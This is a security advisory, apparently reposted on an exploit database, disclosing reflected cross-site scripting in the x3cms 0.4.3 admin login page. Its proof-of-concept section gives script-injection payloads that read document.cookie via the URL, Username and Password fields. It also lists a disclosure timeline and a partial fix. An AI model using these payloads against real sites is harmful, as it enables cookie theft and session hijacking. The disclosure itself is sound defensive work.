x3cms 0.4.3 Cross Site Scripting

2012.01.14
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Advisory: Multiple Cross-Site-Scripting vulnerabilities in x3cms Advisory ID: INFOSERVE-ADV2011-04 Author: Stefan Schurtz Contact: security@infoserve.de Affected Software: Successfully tested on x3cms 0.4.3 other versions may also be affected Vendor URL: http://www.x3cms.net/ Vendor Status: Partial Fix Secunia-ID: SA46748 ========================== Vulnerability Description ========================== x3cms 0.4.3 is prone to multiple XSS vulnerability ================== PoC-Exploit ================== tested on IE8 http://<target>/x3cms-0.4.3-STABLE/admin/login?'"</script><script>alert(document.cookie)</script> tested IE8 / FF 3.6.23 http://<target>/x3cms-0.4.3-STABLE/admin/login -> 'Username' field -> '"</script><script>alert(document.cookie)</script> http://<target>/x3cms-0.4.3-STABLE/admin/login -> 'Password' field -> '"</script><script>alert(document.cookie)</script> ========= Solution: ========= Partial Fix in Version 0.4.3.1 ==================== Disclosure Timeline: ==================== 08-Nov-2011 - Secunia SVCRP (vuln@secunia.com) 11-Jan-2012 - release date of this security advisory ======== Credits: ======== Vulnerabilities found and advisory written by the INFOSERVE Security Team =========== References: =========== http://secunia.com/advisories/46748/ http://x3cms.bzr.sourceforge.net/bzr/x3cms/revision/977 http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-04.txt

References:

http://www.x3cms.net/
http://x3cms.bzr.sourceforge.net/bzr/x3cms/revision/977
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-04.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top